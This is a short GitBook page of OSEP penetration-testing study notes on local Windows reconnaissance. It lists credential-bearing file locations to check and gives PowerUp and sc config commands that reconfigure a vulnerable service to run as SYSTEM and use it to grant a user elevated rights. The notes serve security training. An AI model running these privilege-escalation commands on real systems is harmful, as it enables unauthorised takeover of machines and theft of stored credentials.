OSEP Notes
  • Introduction
  • Useful Links, Tools & Tricks
  • OSEP
    • Metasploit Payload & Listener
      • Metasploit Useful Modules
      • Encoder
    • File Transfer & Execution
    • Phishing
    • Local Reconnaissance Windows
      • SQL Server Instance
      • Application Whitelisting & Credentials
    • Local Reconnaissance Linux
      • Ansible
    • Privilege Escalation
    • Pivoting
    • Pass the Hash
      • Remote Access
    • Post Exploitation
      • Add User
      • AMSI, CLM, & App Locker
    • Credentials
    • Lateral Movement
  • Active Directory
    • Domain Reconnaissance on Kali
    • Domain Reconnaissance on Windows
    • Active Directory Forest
Powered by GitBook
On this page
  1. OSEP

Local Reconnaissance Windows

Local Enumeration

  • whoami /priv

  • Files and Directories

C:\program files\

C:\program files (x86)\

C:\users\bob\document

C:\users\bob\desktop

C:\users\bob\.ssh

C:\program Files\setup\mail.ps1

C:\inetpub\wwwroot\login.aspx (If web app uses MSSQL)

  • Local Session

Available tokens of other users/services

  • Vulnerable Service

ipmo .\powerup.ps1

invoke-allchecks

sc qc vuln

sc config vuln start demand  //Change start type

sc config vuln obj "NT AUTHORITY\SYSTEM"  //Change owner

Invoke-serviceabuse -name 'vuln' -username 'red\alice'  //Abuse
PreviousPhishingNextSQL Server Instance

Last updated 1 year ago